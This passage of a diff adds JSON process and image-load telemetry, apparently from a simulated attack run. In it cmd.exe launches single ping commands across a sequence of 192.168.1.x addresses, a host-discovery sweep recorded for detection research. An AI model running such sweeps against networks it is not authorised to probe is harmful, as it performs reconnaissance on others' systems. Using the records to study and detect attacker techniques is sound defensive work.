"C:\\Windows\\System32\\KernelBase.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "process", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572711840000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.149", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "process", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572716990000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.150", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "process", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572721830000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.151", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6428, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "process", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572726840000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.152", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6132, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572726980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "process", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572731990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.153", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "process", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572736830000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.154", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "process", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572741990000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.155", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": 